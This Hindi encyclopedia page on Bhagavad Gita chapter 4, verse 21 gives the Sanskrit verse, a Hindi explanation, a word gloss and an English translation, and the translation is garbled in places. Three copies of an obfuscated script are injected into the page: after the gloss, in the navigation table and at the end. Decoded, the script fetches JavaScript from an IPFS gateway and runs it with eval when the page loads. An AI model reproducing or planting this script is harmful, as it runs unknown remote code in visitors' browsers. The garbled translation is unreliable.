गीता अध्याय-4 श्लोक-21 / Gita Chapter-4 Verse-21
प्रसंग-
उपर्युक्त श्लोकों में यह बात सिद्ध की गयी कि परमात्मा को प्राप्त सिद्ध महापुरुषों का तो कर्म करने या न करने से कोई प्रयोजन नहीं रहता तथा ज्ञानयोग के साधक का ग्रहण और त्याग शास्त्रसम्मत, आसक्तरहित और ममतारहित होता है; अत: वे कर्म करते हुए या उनका त्याग करते हुए-सभी अवस्थाओं में कर्मबन्धन से सर्वथा मुक्त हैं। अब भगवान् यह बात दिखलाते हैं कि कर्म में अकर्म दर्शन पूर्वक कर्म करने वाला कर्मयोगी भी कर्मबन्धन में नहीं पड़ता-
निराशीर्यतचित्तात्मा त्यक्तसर्वपरिग्रह: ।
शारीरं केवलं कर्म कुर्वतन्नाप्नोपि किल्बिषम् ।।21।।
|
जिसका अन्त:करण और इन्द्रियों के सहित शरीर जीता हुआ है और जिसने समस्त भोगों की सामग्री का परित्याग कर दिया है, ऐसा आशारहित पुरुष केवल शरीर-सम्बन्धी कर्म करता हुआ भी पाप को नहीं प्राप्त होता ।।21।।
|
Having subdued his mind and body, and given up all objects of enjoyment, and free from craving; he who perspan s sheer bodily action-xhrs, does not incur sin. (21)
|
यतचित्तात्मा = जीत लिया है अन्त:करण और शरीर जिसने (तथा); त्यक्तसर्वपरिग्रह: = त्याग दी है संपूर्ण भोगों की सामग्री जिसने (ऐसा); निराशी: = आशारहित पुरुष; केवलम् = केवल; शारीरम् = शरीरसम्बन्धी; कर्म = कर्म को; कुर्वन् = करता हुआ (भी); किल्बिषम् = पापको; न = नहीं; आप्रोति = प्राप्त होता है।
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
टीका टिप्पणी और संदर्भ
संबंधित लेख
|
महाभारत |
---|
| महाभारत के पर्व | | | महाभारत के चरित्र | | | स्थान | | | महाभारत कथा | | | अन्य | |
| <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
वर्णमाला क्रमानुसार लेख खोज
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>